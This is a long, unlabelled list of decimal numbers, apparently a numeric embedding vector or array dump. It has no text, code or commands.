-0.0178384929895401, -0.011257012374699116, -0.04487914592027664, -0.016364360228180885, -0.0486910454928875, -0.00823429599404335, 0.02654927596449852, 0.006425133440643549, 0.0020399612840265036, -0.01502423919737339, 0.02008691616356373, 0.0004627603630069643, 0.008360862731933594, 0.014532862231135368, -0.020905880257487297, 0.014599868096411228, -0.013162961229681969, 0.011100664734840393, -0.0032460696529597044, 0.0010348708601668477, 0.0665295347571373, 0.02689175121486187, 0.060960590839385986, -0.0006770400214008987, -0.016141006723046303, -0.02379458397626877, -0.015947433188557625, 0.0008068642346188426, -0.030524967238307, -0.006756440736353397, -0.012768370099365711, 0.016691945493221283, 0.007474894169718027, 0.028485005721449852, 0.011398469097912312, 0.01940196566283703, 0.0008147746557369828, -0.01523270271718502, 0.002851478522643447, -0.03764249384403229, 0.052592284977436066, -0.026013227179646492, -0.0014806470135226846, -0.029720894992351532, -0.022320451214909554, 0.02360101044178009, 0.015828311443328857, -0.012128090485930443, 0.004459623247385025, -0.027740493416786194, 0.009581861086189747, 0.01355010736733675, -0.051430847495794296, 0.016141006723046303, 0.009529746137559414, -0.01450308132916689, 0.013766015879809856, -0.0002331251307623461, -0.014979569241404533, -0.029259297996759415, 0.03219267353415489, 0.0014294618740677834, -0.03948888182640076, 0.011554816737771034, 0.040441859513521194, 0.015001904219388962, -0.002343349624425173, 0.03335411101579666, -0.040024932473897934, 0.004459623247385025, -0.0205782949924469, 0.008613997139036655, 0.013833021745085716, -0.005799743812531233, 0.034277305006980896, 0.015083801001310349, -0.017034420743584633, 0.017093980684876442, -0.013877691701054573, 0.005483326502144337, 0.02141214720904827, -0.023154303431510925, -0.005613615736365318, 0.033919937908649445, 0.01701953075826168, 0.0024122169706970453, -0.004266050178557634, -0.024300850927829742, 0.0192083939909935, -0.02832121215760708, -0.0055131069384515285, 0.014681764878332615, 0.023437218740582466, -0.006719215307384729, 0.011368689127266407, 0.000877127458807081, 0.002535061212256551, 0.019506197422742844, -0.03100145421922207, -0.007623796351253986, 0.02723422646522522, 0.02044428326189518, 0.017034420743584633, -0.04898884892463684, -0.03156728297472, -0.028901930898427963, -0.046814873814582825, -0.03058452717959881, 0.006674544420093298, -0.016304798424243927, 0.03252025693655014, -0.001754254917614162, -0.03889327496290207, -0.009909446351230145, -0.040650323033332825, -0.028782809153199196, 0.005245082546025515, 0.014949788339436054, -0.010728408582508564, -0.03320520743727684, 0.03764249384403229, -0.031031234189867973, 0.00864377710968256, 0.031061014160513878, -0.03526005893945694, -0.03368169441819191, -0.025626081973314285, 0.021307915449142456, -0.002998519688844681, -0.008502320386469364, -0.008472539484500885, -0.028976382687687874, -0.0035643482115119696, 0.025477180257439613, 0.06629129499197006, 0.043390125036239624, -0.035021815448999405, 0.010400824248790741, -0.013721344992518425, -0.010936872102320194, 0.02525382675230503, -0.0052413600496947765, 0.006164554040879011, -0.008978807367384434, 0.03126947954297066, 0.0003254910698160529, -0.01913394220173359, -0.02016136795282364, -0.02806807868182659, -0.026430154219269753, -0.03829766437411308, 0.004057587124407291, -0.005844414234161377, 0.02470288798213005, -0.008137509226799011, 0.010095573961734772, 0.008293856866657734, 0.006332069169729948, 0.02517937496304512, 0.03004847839474678, 0.029333747923374176, -0.011577151715755463, -0.023615900427103043, -0.006358127109706402, 0.024539094418287277, -0.015664519742131233, 0.014443520456552505, 0.044760026037693024, 0.0277851652354002, 0.010795415379106998, -0.028633907437324524, 0.029452869668602943, -0.007154754363000393, 0.05583835393190384, -0.041543733328580856, -0.034753791987895966, 0.04577255994081497, -0.0012079697335138917, -0.041603296995162964, 0.027948956936597824, -0.01995290443301201, 0.0002227717632194981, -0.043807048350572586, -0.007705692667514086, -0.02957199141383171, 0.02510492317378521, 0.005077567417174578, 0.007966271601617336, 0.015322044491767883, -0.019908234477043152, -0.021724842488765717, 0.0011139751877635717, 0.04636817052960396, 0.025090033188462257, 0.0003641126095317304, 0.02285649999976158, -0.012284438125789165, 0.002628125250339508, -0.019804002717137337, -0.012061084620654583, -0.006198057439178228, -0.02008691616356373, 0.0209356602281332, -0.00197295518592, 0.01612611673772335, -0.010914537124335766, -0.005498216487467289, -0.007869484834372997, 0.008412978611886501, 0.012023858726024628, 0.015456056222319603, -0.036540620028972626, -0.001662121620029211, -0.03719578683376312, 0.008867130614817142, -0.005453546065837145, 0.020459173247218132, 0.008934136480093002, -0.008018387481570244, 0.001168882823549211, -0.02462843619287014, -0.0009520439198240638, 0.014570088125765324, 0.007314824499189854, 0.008353417739272118, 0.000015617290046066046, -0.01934240572154522, 0.010572061873972416, 0.011748389340937138, -0.001424808637239039, 0.0008231503888964653, 0.012418449856340885, -0.006075212731957436, 0.011964297853410244, 0.003134392900392413, -0.0003913338005077094, 0.038923054933547974, -0.037702057510614395, -0.03531961888074875, 0.018359649926424026, 0.012813040986657143, 0.02702576294541359, -0.009760544635355473, -0.02059318497776985, 0.006771331187337637, 0.010341263376176357, 0.01361711323261261, -0.0049323877319693565, -0.018880808725953102, 0.012254657223820686, -0.037910521030426025, 0.0016342024318873882, 0.025283606722950935, 0.01576875150203705, -0.012269547209143639, -0.004869104363024235, 0.0071100834757089615, 0.02654927596449852, -0.014227612875401974, 0.017749151214957237, 0.022335341200232506, 0.004790930543094873, -0.004295830614864826, 0.018612785264849663, -0.023273425176739693, 0.0063395146280527115, -0.0016379250446334481, -0.002330320654436946, 0.002944542560726404, -0.017659809440374374, 0.04225846752524376, 0.02312452346086502, -0.02354145050048828, -0.01557517796754837, 0.0012237905757501721, 0.008517210371792316, -0.0005234845448285341, -0.024241290986537933, 0.025298496708273888, 0.013922362588346004, 0.022126877680420876, 0.060275640338659286, 0.008338527753949165, 0.013527771458029747, -0.018017174676060677, 0.023437218740582466, 0.014383959583938122, -0.015798531472682953, 0.009157489985227585, 0.021650390699505806, -0.05810166895389557, -0.00809283833950758, -0.01941685751080513, 0.013155516237020493, 0.029825126752257347, -0.02380947396159172, -0.01306617446243763, -0.006480971351265907, -0.014019149355590343, -0.005364204291254282, 0.03463466838002205, 0.018672345206141472, -0.019327515736222267, -0.02489645965397358, 0.03874437138438225, 0.033919937908649445, -0.0007417194428853691, -0.01969977095723152, 0.012947052717208862, -0.004604802932590246, 0.019238173961639404, -0.02182907424867153, -0.02319897525012493, -0.0329371839761734, -0.0031064737122505903, 0.02257358469069004, 0.010936872102320194, 0.019774222746491432, 0.047231800854206085, -0.036808643490076065, 0.003975690808147192, 0.01654304377734661, 0.018344759941101074, 0.034962255507707596, 0.0002859389060176909, 0.035647206008434296, 0.03877415135502815, -0.012708809226751328, -0.00044647417962551117, -0.017391785979270935, -0.02428596094250679, -0.030822770670056343, -0.00330190802924335, 0.024241290986537933, -0.01673661544919014, -0.020682526752352715, -0.012291883118450642, 0.034872911870479584, 0.02675773948431015, -0.01721310243010521, 0.004318166058510542, -0.011160225607454777, 0.021665280684828758, -0.014875337481498718, -0.021799292415380478, 0.015485837124288082, 0.03156728297472, -0.02757670171558857, 0.02141214720904827, 0.007713138125836849, 0.01477855071425438, -0.005092457868158817, 0.007143586874008179, -0.019595539197325706, 0.0027323567774146795, 0.008941581472754478, 0.002179556991904974, -0.018061846494674683, -0.016483481973409653, 0.060335204005241394, -0.007545622996985912, 0.010899646207690239, 0.00562478369101882, 0.02118879370391369, -0.008405533619225025, 0.02071230672299862, -0.011376134119927883, -0.012939607724547386, 0.006462358869612217, -0.045176949352025986, 0.003908684942871332, 0.01721310243010521, 0.004433565307408571, 0.0006989100365899503, 0.01825541816651821, -0.007735473103821278, -0.002518309745937586, 0.016498371958732605, 0.015798531472682953, -0.02613234892487526, 0.015076355077326298, -0.032133109867572784, 0.01846388168632984, 0.027323568239808083, -0.03582588583230972, -0.005695512052625418, 0.0076908026821911335, -0.023303207010030746, 0.0029184846207499504, -0.022543804720044136, -0.014726434834301472, -0.035021815448999405, -0.04630860686302185, -0.0062017799355089664, 0.006905342917889357, -0.009954117238521576, -0.010825195349752903, -0.0019357296405360103, 0.013937253504991531, -0.006402797996997833, -0.025834545493125916, -0.0054163201712071896, 0.013103400357067585, -0.0010209112660959363, -0.0026225412730127573, 0.022528914734721184, -0.0017105148872360587, 0.0034377812407910824, 0.005825801752507687, 0.0028570624999701977, 0.004057587124407291, 0.03984624892473221, -0.020354941487312317, -0.02354145050048828, -0.010475275106728077, 0.012872601859271526, 0.029140176251530647, -0.042496711015701294, 0.015195476822555065, -0.002991074463352561, 0.010140244849026203, 0.0028719527181237936, -0.017853382974863052, -0.017644919455051422, -0.0007235719822347164, 0.03183530643582344, -0.012626913376152515, 0.014927453361451626, -0.04216912388801575, 0.003506648587062955, 0.0031716185621917248, 0.013453320600092411, 0.014637093991041183, 0.016796177253127098, 0.0018659316701814532, 0.03972712904214859, -0.016557933762669563, 0.013445875607430935, -0.002965016523376107, 0.014674318954348564, 0.014488191343843937, -0.031865086406469345, -0.0012935885461047292, 0.030078260228037834, -0.027249116450548172, 0.005505661480128765, 0.022052427753806114, 0.02503047324717045, 0.0439261719584465, -0.035081375390291214, 0.008204515092074871, -0.019982686266303062, 0.04508760944008827, -0.007675912231206894, 0.0006756440852768719, 0.0035513192415237427, -0.01913394220173359, 0.012731144204735756, 0.0009283126564696431, -0.015158251859247684, 0.0030971672385931015, 0.03561742603778839, -0.02023581974208355, -0.0009325005230493844, -0.02648971416056156, 0.0020250710658729076, 0.019535979256033897, -0.015560287982225418, -0.0138925826177001, 0.0030431903433054686, 0.0030971672385931015, -0.029199736192822456, -0.024807119742035866, -0.015307153575122356, -0.01810651645064354, -0.041126810014247894, 0.036123692989349365, -0.030495185405015945, 0.029467759653925896, -0.01165904849767685, -0.011122999712824821, 0.013200187124311924, 0.008874575607478619, 0.0050254520028829575, 0.012835375964641571, 0.007538177538663149, -0.008137509226799011, 0.019982686266303062, 0.002134886337444186, -0.016706835478544235, 0.010110464878380299, 0.00003952308543375693, -0.04330078139901161, -0.00008352487202500924, -0.015240147709846497, 0.01996779441833496, 0.007653576787561178, 0.003287017811089754, 0.012232322245836258, 0.005099902860820293, -0.024047717452049255, -0.004020361229777336, 0.01639414019882679, -0.015530507080256939, 0.02503047324717045, -0.004072477109730244, -0.005248805042356253, -0.016170786693692207, 0.054379113018512726, -0.0010888478718698025, -0.00401291623711586, -0.005174354184418917, -0.006209224928170443, 0.0015206645475700498, -0.038595471531152725, -0.016170786693692207, 0.005602448247373104, -0.000012360052096482832, 0.002034377306699753, 0.041543733328580856, 0.0411565899848938, -0.02318408526480198, 0.016974858939647675, -0.015545397996902466, -0.009864775463938713, -0.002484806813299656, -0.010460385121405125, 0.0004592704644892365, -0.001814746530726552, 0.023779693990945816, 0.012321663089096546, -0.012961942702531815, -0.014897672459483147, 0.02949754148721695, 0.017436455935239792, -0.01865745522081852, -0.022052427753806114, 0.02866368740797043, -0.015091245993971825, -0.04583211988210678, -0.021218573674559593, 0.030063370242714882, 0.01749601773917675, -0.011122999712824821, -0.03573654592037201, -0.017138652503490448, -0.010460385121405125, 0.03018249198794365, 0.04473024234175682, -0.024092387408018112, 0.01482322160154581, -0.027800055220723152, 0.009358508512377739, -0.006495861802250147, -0.052443381398916245, 0.0043702819384634495, -0.017942724749445915, -0.00967120286077261, -0.00735577242448926, 0.005769963376224041, 0.00895647145807743, -0.036332156509160995, -0.03332433104515076, 0.03025694191455841, 0.03805942088365555, -0.017510907724499702, -0.033294547349214554, -0.008785233832895756, -0.019461527466773987, -0.010892201215028763, 0.00960419699549675, 0.006231560371816158, -0.007605183869600296, -0.023630790412425995, -0.01810651645064354, 0.04371770843863487, 0.002670934656634927, 0.008606551215052605, -0.00126846123021096, 0.020399611443281174, -0.013497991487383842, -0.009187270887196064, -0.03677886351943016, -0.006819724105298519, 0.009857330471277237, -0.05309855192899704, 0.014398850500583649, -0.007675912231206894, 0.033919937908649445, 0.01368411909788847, 0.006484694313257933, -0.03925063833594322, 0.013795795850455761, -0.007936491630971432, -0.03990580886602402, -0.04473024234175682, 0.019655101001262665, -0.0005332562723197043, -0.02038472145795822, 0.007646131794899702, -0.00500683905556798, 0.006577758118510246, -0.009425514377653599, 0.02120368368923664, 0.008256630972027779, -0.04347946494817734, 0.016066554933786392, -0.027740493416786194, -0.037702057510614395, -0.021025002002716064, -0.007839704863727093, 0.016364360228180885, -0.0010693044168874621, -0.019923124462366104, -0.0007822022889740765, 0.0007449766853824258, -0.019565759226679802, 0.009306392632424831, -0.0356769859790802, -0.01162926759570837, -0.015091245993971825, -0.004898884799331427, -0.011026213876903057, -0.005036619491875172, 0.03010804019868374, -0.022886279970407486, -0.013646893203258514, -0.021561048924922943, 0.00639535253867507, 0.010430604219436646, 0.043390125036239624, -0.029750674962997437, -0.017034420743584633, 0.0022372566163539886, 0.03204376995563507, -0.04589167982339859, 0.011346353217959404, -0.014972124248743057, -0.00181846902705729, 0.007966271601617336, 0.03889327496290207, 0.02017625793814659, 0.0459810234606266, -0.019089272245764732, 0.03171618655323982, -0.03126947954297066, -0.011889846995472908, 0.01293216273188591, 0.003642522031441331, -0.006756440736353397, 0.012894936837255955, 0.04377726837992668, -0.00929894670844078, -0.002319152932614088, -0.004548964556306601, 0.02175462245941162, 0.04836345836520195, -0.022528914734721184, -0.00012005245662294328, -0.010214695706963539, 0.007653576787561178, 0.016632383689284325, -0.04344968497753143, -0.002473639091476798, 0.005211579613387585, -0.013758569955825806, -0.019908234477043152, -0.005997039377689362, -0.014532862231135368, -0.020399611443281174, -0.0027435244992375374, 0.02867857925593853, 0.004031529184430838, -0.029661333188414574, 0.011257012374699116, -0.030763210728764534, 0.0240030474960804, -0.024509314447641373, 0.010586951859295368, -0.016617493703961372, 0.023764804005622864, 0.023511668667197227, -0.03162684291601181, 0.00877778884023428, -0.01279815100133419, -0.027606481686234474, 0.011324018239974976, 0.02421151101589203, 0.05110326036810875, -0.03832744434475899, 0.0016574684996157885, -0.01968488097190857, -0.000875266210641712, 0.012046193704009056, 0.02255869470536709, -0.009239385835826397, -0.021099451929330826, 0.019804002717137337, -0.010333818383514881, -0.004790930543094873, 0.0008426938438788056, 0.011443139985203743, -0.004642028361558914, -0.01564962975680828, -0.023347876965999603, 0.02785961516201496, -0.003953355364501476, -0.025372948497533798, 0.022141767665743828, 0.03904217854142189, -0.007884375751018524, -0.02909550443291664, -0.004642028361558914, -0.0006407451000995934, -0.0004176243382971734, 0.015180586837232113, -0.02036983147263527, 0.002996658207848668, -0.005058954935520887, 0.032282013446092606, 0.004723924677819014, 0.038655031472444534, -0.030644088983535767, -0.004172986373305321, -0.011450584977865219, 0.006056600250303745, -0.007471171673387289, -0.011182560585439205, -0.021650390699505806, -0.008375752717256546, -0.01749601773917675, -0.0018929202342405915, -0.034813351929187775, -0.031597062945365906, -0.01416060607880354, 0.008159845136106014, 0.009939227253198624, -0.004548964556306601, -0.023377656936645508, 0.01879146695137024, 0.013952143490314484, -0.023586120456457138, -0.01687062717974186, 0.023854143917560577, -0.035438742488622665, 0.02936352975666523, -0.004805820994079113, -0.022320451214909554, -0.02118879370391369, -0.027040652930736542, -0.009045813232660294, -0.017808713018894196, 0.007802479434758425, -0.039548445492982864, 0.0246879979968071, -0.011956852860748768, -0.005673176608979702, 0.010773079469799995, -0.01544116623699665, -0.017391785979270935, -0.010817750357091427, -0.0013829298550263047, -0.014562642201781273, 0.016557933762669563, -0.02099522016942501, 0.023154303431510925, 0.0980968177318573, -0.02558141015470028, 0.015351824462413788, -0.020831428468227386, 0.005903975106775761, -0.01108577474951744, 0.011822841130197048, 0.007757808547466993, -0.0009613503352738917, 0.005137128755450249, 0.0291550662368536, -0.007258986122906208, -0.0013391898246482015, -0.0025480901822447777, 0.001846388215199113, -0.0057215699926018715, 0.0010162580292671919, -0.007832259871065617, 0.02689175121486187, -0.022811828181147575, -0.005948645994067192, 0.010021123103797436, 0.020191147923469543, -0.018895698711276054, 0.02092077024281025, -0.019580649212002754, -0.006730382796376944, -0.022141767665743828, -0.017585359513759613, -0.022692706435918808, 0.002110689878463745, -0.015590067952871323, -0.00932872761040926, -0.01516569685190916, 0.0014452827163040638, -0.0055131069384515285, 0.007847149856388569, -0.012187651358544827, -0.035974789410829544, -0.008241740986704826, 0.009529746137559414, -0.021784402430057526, 0.004347946494817734, 0.014354179613292217, 0.006268785800784826, -0.011271902360022068, 0.011681383475661278, 0.016840847209095955, -0.0009306392166763544, -0.016766395419836044, 0.0034526714589446783, -0.015426276251673698, 0.013185296207666397, 0.018374541774392128, 0.020876098424196243, 0.023615900427103043, -0.00469786673784256, -0.015180586837232113, -0.006633596494793892, -0.010676293633878231, -0.0027379405219107866, 0.013676674105226994, -0.033503010869026184, 0.03177574649453163, 0.00295943277888, -0.014562642201781273, -0.01218020636588335, 0.015061465092003345, -0.017659809440374374, 0.008695892989635468, -0.01022214163094759, 0.01749601773917675, 0.006577758118510246, -0.002149776555597782, 0.0055875577963888645, 0.0030953059904277325, 0.007661022245883942, 0.03808920085430145, -0.018717017024755478, 0.009030923247337341, 0.018300089985132217, 0.02196308597922325, -0.014830666594207287, 0.018672345206141472, 0.0016556071350350976, 0.021784402430057526, -0.01618567667901516, 0.004455900751054287, -0.002696992363780737, -0.010549725964665413, -0.0002968739136122167, 0.00836830772459507, 0.01578364148736, 0.010869866237044334, 0.014339289627969265, 0.01620056852698326, -0.004400062374770641, -0.0033614689018577337, -0.01121978648006916, -0.00798860751092434, 0.002441997407004237, -0.010132799856364727, 0.0315375030040741, -0.006209224928170443, -0.024777337908744812, -0.0067266603000462055, -0.014793440699577332, 0.016304798424243927, -0.013229967094957829, -0.012545016594231129, -0.03624281287193298, 0.0012507791398093104, 0.008211960084736347, -0.00984988547861576, -0.014048929326236248, 0.020697416737675667, 0.007538177538663149, -0.011093219742178917, -0.030554747208952904, -0.04431331902742386, -0.02428596094250679, -0.02757670171558857, 0.05345591530203819, -0.027755383402109146, 0.022722488269209862, -0.0014424908440560102, 0.003210705239325762, -0.012411004863679409, 0.016081444919109344, 0.008137509226799011, 0.02099522016942501, -0.008494874462485313, 0.002326598158106208, -0.004869104363024235, 0.02141214720904827, -0.016483481973409653, 0.028023408725857735, -0.009090484119951725, 0.003540151519700885, -0.006462358869612217, -0.005866749677807093, 0.0003101355105172843, 0.024985801428556442, 0.0019059490878134966, 0.006942568812519312, 0.00038505197153426707, -0.008666112087666988, -0.005137128755450249, 0.0015616125892847776, 0.021784402430057526, -0.009477630257606506, -0.02934863790869713, 0.015456056222319603, 0.012299328111112118, 0.0036853314377367496, 0.006157109048217535, 0.0035941286478191614, -0.0017784516094252467, -0.010021123103797436, -0.011376134119927883, 0.012634358368813992, -0.013148071244359016, 0.006320901680737734, -0.012031303718686104, 0.004087367560714483, 0.033026523888111115, 0.008651222102344036, -0.032698940485715866, -0.02852967567741871, -0.015828311443328857, 0.020429391413927078, -0.004623415879905224, -0.024613546207547188, 0.008658667095005512, 0.012299328111112118, 0.020280489698052406, -0.007675912231206894, 0.01962531916797161, 0.03287762403488159, -0.034545328468084335, 0.0053716497495770454, 0.036659739911556244, 0.014138271100819111, 0.0004429842811077833, -0.006641041487455368, -0.04264561086893082, -0.012425894849002361, 0.008130064234137535, -0.035021815448999405, 0.004857936874032021, 0.005356759298592806, 0.03624281287193298, -0.002443858655169606, -0.016289908438920975, -0.004496848676353693, -0.013363978825509548, -0.0000991130800684914, 0.0035736546851694584, -0.006097548175603151, -0.00843531358987093, -0.00601937435567379, -0.016438812017440796, -0.014324398711323738, -0.003834233619272709, -0.009202160872519016, -0.026504606008529663, 0.0024122169706970453, 0.0037467535585165024, -0.019119052216410637, 0.0018826831365004182, -0.012262102216482162, -0.011465474963188171, -0.002520170994102955, -0.0004427516250871122, 0.004057587124407291, 0.022052427753806114, 0.0013587332796305418, -0.008874575607478619, 0.004537797067314386, -0.001472271280363202, 0.008115174248814583, 0.007084026001393795, 0.009127709083259106, 0.0021367475856095552, -0.0002680241013877094, 0.02270759642124176, 0.035081375390291214, -0.018151188269257545, -0.001739364699460566, 0.006812279112637043, -0.034336864948272705, -0.013907472603023052, -0.01947641745209694, 0.023243645206093788, -0.010929427109658718, -0.025283606722950935, 0.014197831973433495, 0.023303207010030746, 0.0012107616057619452, -0.021501488983631134, -0.00034084662911482155, -0.011986632831394672, -0.00399430375546217, -0.009887111373245716, -0.009969007223844528, -0.00018775646458379924, 0.0055131069384515285, -0.006488416809588671, -0.009060703217983246, 0.02133769541978836, -0.009887111373245716, 0.005393984727561474, -0.00021276739425957203, -0.009380843490362167, -0.01402659434825182, 0.020280489698052406, 0.007441391237080097, 0.0035810996778309345, 0.00802583247423172, 0.006049154791980982, 0.016409030184149742, -0.004910052753984928, -0.012068529613316059, 0.010088128969073296, -0.01941685751080513, 0.024166839197278023, 0.005401430185884237, -0.006272508297115564, 0.014934898354113102, -0.0004427516250871122, 0.0257303137332201, 0.015530507080256939, 0.017123762518167496, -0.012582242488861084, -0.007400443311780691, -0.006056600250303745, 0.003475006902590394, -0.015724079683423042, 0.007292489055544138, -0.0029464038088917732, -0.009164934977889061, 0.05405152589082718, 0.006767608225345612, -0.037910521030426025, 0.0062017799355089664, -0.03189486637711525, -0.02139725722372532, -0.014086155220866203, -0.01831497997045517, -0.017317334190011024, -0.012016413733363152, 0.02098033018410206, 0.010103019885718822, -0.017049310728907585, 0.026311032474040985, 0.010936872102320194, -0.008055613376200199, 0.0185234434902668, -0.02147170901298523, -0.00047648727195337415, 0.002983629470691085, 0.03409862145781517, 0.01949130743741989, 0.0018798912642523646, -0.0013298834674060345, 0.02249913476407528, -0.008651222102344036, -0.01382557675242424, 0.0070691355504095554, -0.019253063946962357, -0.0003717903746291995, 0.007162199355661869, 0.006335791666060686, -0.023422328755259514, 0.009626531973481178, -0.00473136967048049, 0.002190724713727832, -0.003653689520433545, -0.006157109048217535, 0.016587713733315468, 0.024807119742035866, -0.017927834764122963, -0.031120575964450836, -0.029661333188414574, -0.023422328755259514, -0.0056806220673024654, 0.01681106723845005, 0.0007947658887133002, -0.010304037481546402, -0.015128470957279205, 0.01804695650935173, 0.030376063659787178, 0.032490476965904236, 0.004243714734911919, 0.0007998844375833869, -0.01019236072897911, 0.007787588983774185, 0.011472919955849648, -0.0043367790058255196, -0.005714124999940395, -0.026117458939552307, 0.0028887041844427586, -0.00823429599404335, 0.011413359083235264, 0.01736200600862503, 0.007471171673387289, 0.007054245099425316, -0.004303275607526302, 0.005702957045286894, -0.0164685919880867, -0.020399611443281174, 0.004671808797866106, -0.005531719420105219, 0.010073238983750343, -0.006480971351265907, 0.0032535146456211805, 0.004206489305943251, 0.020622964948415756, 0.019789112731814384, -0.02031026966869831, -0.0209356602281332, 0.006856949999928474, -0.024271070957183838, -0.003126947907730937, 0.012329108081758022, -0.020250709727406502, 0.0003152540302835405, 0.016349470242857933, 0.003166034584864974, 0.0036704412195831537, -0.009626531973481178, 0.025015583261847496, 0.035081375390291214, 0.011279347352683544, 0.003655550768598914, -0.003841678611934185, 0.01652815192937851, -0.03552808240056038, -0.008934136480093002, 0.03010804019868374, 0.015679409727454185, -0.011852621100842953, 0.005003116559237242, 0.017749151214957237, -0.017123762518167496, 0.01914883218705654, -0.009730763733386993, 0.0065144747495651245, 0.008472539484500885, 0.009499965235590935, 0.003491758368909359, 0.001078610890544951, 0.01742156594991684, 0.022126877680420876, 0.025700533762574196, 0.01347565557807684, 0.0111527806147933, -0.012008968740701675, -0.024107279255986214, -0.002350794617086649, 0.016036774963140488, -0.009470184333622456, -0.005051509942859411, 0.01505402009934187, 0.0024010492488741875, -0.004068754613399506, -0.0027956401463598013, 0.000360390025889501, 0.02942308969795704, 0.006715492811053991, 0.009864775463938713, -0.0008529308252036572, -0.007575403433293104, -0.01846388168632984, -0.02029537968337536, 0.013118290342390537, -0.006644763983786106, -0.006853227037936449, -0.01865745522081852, -0.019431747496128082, 0.022588474676012993, -0.023898815736174583, -0.02339254692196846, -0.023362766951322556, 0.014331843703985214, -0.018627675250172615, -0.012842820957303047, -0.010780524462461472, -0.015046575106680393, -0.027219336479902267, -0.0068978979252278805, -0.0014294618740677834, -0.001150270109064877, -0.015225257724523544, 0.012746035121381283, -0.011889846995472908, -0.037225570529699326, -0.015381605364382267, -0.0008417631615884602, 0.0010358014842495322, 0.028901930898427963, -0.012813040986657143, -0.004534074105322361, -0.0013838604791089892, 0.005866749677807093, -0.009566971100866795, -0.01804695650935173, -0.02092077024281025, -0.01797250472009182, 0.005866749677807093, 0.014034039340913296, 0.011577151715755463, 0.0030655255541205406, 0.0209356602281332, 0.008219406008720398, 0.009485075250267982, 0.0077280281111598015, -0.006365572102367878, -0.011294237338006496, -0.002535061212256551, 0.015247592702507973, -0.009522300213575363, 0.021456817165017128, 0.008554435335099697, 0.011175115592777729, 0.004437287803739309, -0.00816729012876749, 0.008755453862249851, -0.00833108276128769, -0.01557517796754837, 0.020950550213456154, 0.006715492811053991, 0.016617493703961372, -0.009172379970550537, 0.0029240683652460575, -0.026936421170830727, -0.014182941988110542, -0.01652815192937851, -0.010572061873972416, -0.0007687080069445074, 0.014227612875401974, -0.0008087254827842116, -0.007188257295638323, 0.015545397996902466, 0.004117147997021675, 0.009782879613339901, -0.013148071244359016, 0.008673558011651039, 0.006287398748099804, 0.011860066093504429, 0.022737378254532814, 0.005051509942859411, -0.00014448174624703825, 0.012820485979318619, 0.02257358469069004, 0.015515617094933987, 0.020667636767029762, 0.013736234977841377, 0.009894556365907192, -0.01846388168632984, 0.004988226108253002, -0.0212632454931736, 0.007653576787561178, -0.003785840468481183, 0.004474513232707977, -0.011673938482999802, -0.0006835545063950121, -0.011003877967596054, 0.003841678611934185, -0.005170631688088179, 0.00138572184368968, -0.00504034198820591, -0.005792298354208469, -0.010117909871041775, 0.009760544635355473, 0.003441503969952464, -0.004947278182953596, -0.015426276251673698, -0.029959138482809067, -0.0029296523425728083, 0.006801111623644829, 0.007884375751018524, -0.005457268562167883, -0.02997402846813202, 0.0099466722458601, 0.0029482650570571423, 0.018627675250172615, -0.004169263876974583, -0.003461977932602167, 0.0022484243381768465, 0.013081065379083157, 0.005408875178545713, -0.011718609370291233, 0.0037579212803393602, -0.010676293633878231, 0.011793060228228569, 0.02407749742269516, -0.006015651859343052, 0.0022130601573735476, -0.01983378268778324, 0.01258968748152256, -0.02153126895427704, 0.0062055024318397045, 0.019119052216410637, 0.012515236623585224, -0.009187270887196064, -0.0017058616504073143, 0.002509003272280097, -0.009477630257606506, -0.003329827217385173, -0.006142219062894583, 0.0009585584048181772, 0.005271140486001968, -0.015813421458005905, -0.0033577464055269957, 0.012559906579554081, 0.016081444919109344, 0.004560132045298815, 0.0059337555430829525, 0.014294618740677834, 0.005944923497736454, -0.007661022245883942, 0.027680933475494385, 0.0017914804629981518, 0.006317179184406996, 0.014339289627969265, -0.006220392417162657, 0.02084631845355034, -0.005907697603106499, -0.01576875150203705, -0.0018752380274236202, 0.008911801502108574, -0.008182180114090443, 0.0034210297744721174, -0.008978807367384434, -0.0009217981714755297, 0.011391024105250835, -0.022826718166470528, -0.01913394220173359, -0.005535441916435957, 0.006875562481582165, 0.006387907546013594, -0.0439261719584465, -0.002125580096617341, -0.015381605364382267, -0.0277851652354002, 0.023481888696551323, -0.012440784834325314, -0.01652815192937851, -0.008941581472754478, 0.0018193996511399746, 0.008063058368861675, -0.02491135150194168, 0.005781130865216255, -0.012291883118450642, -0.021695062518119812, -0.01475621573626995, -0.004202766809612513, -0.0060677677392959595, 0.018404321745038033, -0.016796177253127098, 0.017093980684876442, -0.0032963240519165993, -0.025566520169377327, -0.02538783848285675, 0.01618567667901516, 0.030212271958589554, -0.019565759226679802, -0.01224721223115921, -0.01218020636588335, 0.005729014985263348, 0.010103019885718822, -0.01197174284607172, 0.00789182074368, 0.004798376001417637, -0.015664519742131233, 0.0045452420599758625, -0.013393759727478027, -0.031388599425554276, -0.0438963919878006, 0.007869484834372997, 0.008427868597209454, -0.003153005614876747, 0.010274257510900497, -0.004548964556306601, 0.003964523319154978, 0.015173141844570637, -0.03320520743727684, 0.011487810872495174, -0.0037448923103511333, -0.0010469690896570683, 0.013773460872471333, 0.003173479810357094, 0.02380947396159172, -0.01585809327661991, 0.048065654933452606, -0.004723924677819014, -0.008621442131698132, 0.010214695706963539, 0.009432959370315075, -0.007005852181464434, -0.02558141015470028, -0.002646737964823842, 0.008003497496247292, 0.0032311794348061085, 0.0150986909866333, 0.01879146695137024, -0.000995783950202167, -0.010043458081781864, 0.01824052818119526, -0.003631354309618473, 0.018270310014486313, -0.015664519742131233, 0.012954497709870338, 0.00034363853046670556, -0.017347116023302078, -0.0018110239179804921, 0.01791294291615486, -0.005702957045286894, 0.008673558011651039, 0.030435625463724136, 0.0164685919880867, -0.008539545349776745, -0.005081290379166603, -0.003495480865240097, 0.01069862861186266, -0.012626913376152515, 0.013624558225274086, 0.013944698497653008, 0.0076908026821911335, -0.00673782778903842, 0.01218020636588335, -0.014912563376128674, 0.006607538554817438, -0.012463120743632317, -0.005178076680749655, 0.000822685076855123, -0.019535979256033897, -0.012909827753901482, -0.012693919241428375, 0.01728755421936512, -0.00034945501829497516, 0.0007733611855655909, -0.005431210622191429, -0.01272369921207428, -0.023839253932237625, 0.008197070099413395, 0.011145335622131824, 0.002689547371119261, -0.005185521673411131, 0.018553223460912704, 0.015381605364382267, 0.014562642201781273, 0.012857711873948574, -0.0015699883224442601, -0.031597062945365906, -0.014056375250220299, -0.000044059950596420094, 0.004824433941394091, 0.01626012846827507, 0.03624281287193298, -0.02312452346086502, -0.004414952360093594, 0.012805595993995667, 0.001976677682250738, 0.01060184184461832, 0.008420423604547977, -0.010914537124335766, 0.023839253932237625, -0.003990580793470144, 0.016096336767077446, -0.014324398711323738, -0.02188863418996334, -0.008770343847572803, -0.001959926215931773, 0.02421151101589203, 